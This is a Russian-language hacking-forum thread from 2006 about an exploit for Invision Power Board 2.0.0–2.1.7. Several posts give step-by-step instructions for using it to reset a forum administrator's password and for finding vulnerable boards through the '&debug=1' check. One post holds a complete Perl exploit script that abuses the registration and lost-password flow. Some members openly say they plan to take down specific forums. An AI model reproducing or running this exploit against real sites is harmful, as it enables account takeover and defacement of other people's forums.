Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вышел сплоит для Ipb 2.1.7 (https://forum.antichat.xyz/showthread.php?t=26349)

gemaglabin 01.11.2006 20:48
Вышел сплоит для Ipb 2.1.7
 
Наконецто %) бьет версии от 2.0.0 до 2.1.7 , если Debug Level на уровне тройки ( вроде по умолчанию )

Написан на php и требует библиотеку curl , существующего юзера с правильным пассом

http://milw0rm.com/exploits/2696

blackybr 01.11.2006 20:52
смущает Enable SQL Debug Mode is turned on

Цитата:
$ADMIN->html .= $SKIN->add_td_row( array( "<b><i>ENABLE</I> SQL Debug Mode?</b><br>(If yes, add '&debug=1' to any page to view mySQL debug info)" ,
$SKIN->form_yes_no( "sql_debug", $INFO['sql_debug'] )
выдержка из кода админки ) т.е. мы должны запрос чтоли видеть ? ) или я не втыкаю что-то в эту тему

Nova 01.11.2006 20:58
Для успешной информаций форум должен быть в режиме Debug точнее должна быть включена эта опция в админке !

KPOT_f!nd 01.11.2006 23:13
ЗЫ) тестил! прошло на ура! Вот только надо было найти форум в режими Debug было не просто!

}{0TT@БЬ)Ч 01.11.2006 23:48
blackybr
Че это за режим такой ни фига не пойму где его в админке включить?

jonart 02.11.2006 00:04
Подскажите как вообще заюзать его?подскажите пожалуйста!

blackybr 02.11.2006 00:12
SQL Debug Mode не стоит по дефолту.. пытался найти все форумы с включенным модом.. дык они все в дауне либо задэфины.. смешно..)

вообще включать этот мод админы ипб рекомендуют только при обстоятельствах которые напрямую его требуют..

BMaster 02.11.2006 00:18
Включить так:
Настройки - Глобальные Настройки форума - Включить режим отладки SQL?

Сплойт хороший, но этот режим не стоит по дефолту.
Может оно и к лучшему :)

Юзать так: кидаешь сплойт на любой хостинг, редактируешь его, $site = "" полный путь к сайту включая индекс файл, $name = "" ник админа, $pass ="" любой пасс, потом просто запускаешь этот сплойт с хостинга и пароль админа меняется на тобой выбранный.
Error: Probably not vulnerable, or no forum found - значит либо неправильный путь, либо не включена опция отладки, и соответственно сплойт не сработает.
Надпись # milw0rm.com [2006-11-01] означает что введен несуществующий ник, Password Changed! - все прошло успешно, можно заходить под ником админа с новым, выбранным тобой паролем.

p.s проверить включена ли опция отладки на форуме можно так:
Добавить в адресной строке в конец любой ссылки &debug=1 , если появится информация с заголовком sql debugger значит опция включена, если ничего не произойдет значит выключена, и форум не уязвим по этому сплойту :)

jonart 02.11.2006 00:24
нарооод кто нить помогите разобраться по пунтктиком! =(

Ksander 02.11.2006 00:27
Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...

Nekt 02.11.2006 00:34
Цитата:
Сообщение от KPOT_f!nd
ЗЫ) тестил! прошло на ура! Вот только надо было найти форум в режими Debug было не просто!
Ты его на локалке наверно нашел :D

Цитата:
Сообщение от Ksander
Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...
На хосте где его пробуешь Curl вырублен, или сплоит не может определить его.

}{0TT@БЬ)Ч 02.11.2006 00:46
ни одного форума не нашел ЛОЛ
лучше уж через аватарку заюзать.

africanec 02.11.2006 01:31
опасный сплоит
работает тока где наити такие форумы
они правда или в дауне или задефейсены

BMaster 02.11.2006 01:47
Цитата:
Сообщение от Ksander
Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...
Ничего странного, просто php нужно собрать с поддержкой curl :)
Вообщем если хост не твой, то поищи другой, если в linux пересобрать с курлом, как в виндовсе прикрутить не имею понятия :) наверное по дефолту используется...

jonart 02.11.2006 01:58
offtopic
ваще не реально найти сайты такие!

guest3297 02.11.2006 02:07
да согласен нашел токо 1 на этом остановился...
как я понял восновном это отдельне тачки... не хостинги.

Soul Linker 03.11.2006 20:07
Объясните как cURL.dll к PHP прикрутить? Ось - WinXP...
Гуглу покопал, поправил следущее:

Копируем libeay32.dll и ssleay32.dll Из вашей папки PHP в c:\windows\system32
Редактим extensions_dir в php..ini на "d:\apps\php\extensions" (смотрете где у вас лежит php_curl.dll)
Раскомменчиваем в php.ini extension=php_curl.dll
рестарт апача...

Щас работает.

_GaLs_ 03.11.2006 20:51
Вот если бы сплоит вышел на Perl было бы другое дело)) но за то что выложил хоть какой то сплоит сплоит автору +2)

~Real F@ck!~ 04.11.2006 00:07
_GaLs_ прав как никогда.
Выложите плиз на PERL этот сплоит!

Elekt 04.11.2006 18:38
Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.

Utochka 04.11.2006 18:49
думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью.

Интересно посмотреть, что будет через год или более.

}{0TT@БЬ)Ч 04.11.2006 21:07
Цитата:
Сообщение от Elekt
Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.
Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему ;)

limpompo 04.11.2006 21:59
HELP:
Код:
Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:

1. Качаем http://limpompo.jino-net.ru/php_curl.rar
2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
3. Копируем  php_curl.dll в диру [you_apache_dir]\php\extensions
4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
5. Перезагрузи Апачу!
6. Уря =) Работает... ыыыыыы

С Уважением limpompo.

F.A.Q [R3x] 05.11.2006 22:05
Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать.

З.Ы. буду очень признателен

InferNo23 05.11.2006 22:29
Вот прочитай:

http://forum.antichat.ru/thread26510.html

сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...

F.A.Q [R3x] 06.11.2006 21:07
ок спс большое

rowil 07.11.2006 09:29
А почему когда запускаешь сплойт появляется пустое окно?

KSURi 08.11.2006 05:47
Цитата:
Вот если бы сплоит вышел на Perl было бы другое дело))
Цитата:
Выложите плиз на PERL этот сплоит!
На всяк пожарный выложу: (тока я его не тестил!!!)
Код:
#!perl -w

use strict;
use LWP::UserAgent;

my $target="http://127.0.0.1/board/index.php";    # victim
my $name="hax0r";                                # existing user
my $pass="31337";                                # password to set
my $proxy="";                                    # optional: http proxy

my($prefix,$suffix,$regid,$regcode);
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->get($target."?act=Reg&CODE=10");
if($response->is_success)
{
  if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im)
  {
    $prefix=$1;
    $regid=$2;
    $regcode=$3;
  }
  else
  {
    $suffix="&debug=1";
    $response=$ua->get($target."?act=Reg&CODE=10".$suffix);
    if($response->is_success)
    {
      if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im)
      {
        $prefix=$1;
        $regid=$2;
        $regcode=$3;
      }
      else { exit print "\nExploit failed!\n" }
    }
    else { exit print "\nExploit failed!\n" }
  }
}
else { exit print "\nExploit failed!\n" }
$target=$target.$suffix if($suffix);
$response=$ua->post($target,[act=>"Reg",
                            CODE=>11,
                            member_name=>$name,
                            regid=>$regid,
                            reg_code=>$regcode]);
if($response->is_success)
{
  if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
  { changePass($regcode,$regid,$1,$2) }
  elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
  { changePass($regcode,$regid,$1,$2) }
  else { exit print "\nExploit failed!\n" }
}
else { print "\nExploit failed!\n" }

sub changePass
{
  my($regcode,$regid,$vid,$userid)=@_;
  my $ua=LWP::UserAgent->new();
  $ua->proxy("http",$proxy) if($proxy);
  my $response=$ua->post($target,[act=>"Reg",
                                  CODE=>03,
                                  type=>"lostpass",
                                  uid=>$userid,
                                  aid=>$vid,
                                  regid=>$regid,
                                  reg_code=>$regcode,
                                  pass1=>$pass,
                                  pass2=>$pass]);
  if($response->is_success) { exit print "\nExploited!\n" }
  else { exit print "\nExploit failed!\n" }
}

-Bart- 20.11.2006 05:47
C:\Documents and Settings\Bart>C:\Downloads\ipb217.pl

Exploit failed!

_Great_ 20.11.2006 08:42
Ну failed - значит, failed, значит, форум патченный. Чеж ты хочешь то тогда :)

balmer2 22.11.2006 02:49
Есть какой нить способ что бы ломать не лишь бы что,а интересуют пара конкретных форумов...чет через аваторки не прокатывает (или подскажите как заставить админа посмотреть) видимо с СИ плохо ((( а Xss не разбираюсь(((

_Great_ 22.11.2006 08:32
Цитата:
а Xss не разбираюсь(((
а кто тебе мешает? разберись

Fr-Ron 25.11.2006 22:17
Блин, Лимпопо, наф ты удалил файло, чтоб модуль поставить? =( Дайте плз в ПМ этот архивец! =(

limpompo 26.11.2006 11:52
Цитата:
Блин, Лимпопо, наф ты удалил файло, чтоб модуль поставить? =( Дайте плз в ПМ этот архивец! =(
Нечайно =)

Fr-Ron 26.11.2006 13:26
limpompo, можешь в ПМ кинуть архив, или ссылку плз? А то чувствую, так и не дождусь я от юзеров такого подарка Х_х Ибо срочно надо, форум падонка грохнуть. А из-за его отсталости я его уговорил врубить эту функцию :D

limpompo 26.11.2006 13:46
Fr-Ron - нету у меня уже Архива... Так что придётся подождать у кого остался Архивчик

MegaBits 28.11.2006 13:53
Вот выложил megabitshack.narod.ru/php_curl.rar

KP0T 28.11.2006 14:30
Пользы от этого сплойта только посмотреть как с cURL работать на PHP и всё, а найти уязвимый этому форум просто палево.

Fr-Ron 28.11.2006 17:04
Kp0t
Я знаю уязвимый форум, токо он на бесплатном хосте... Там админ му**к еще тот.
Если хочешь душу на этом форуме отвести, в личку стукни ;)


HiM@S:Closed хватить флудить,всё что надо для работы сплойта в теме описано .


Время: 03:24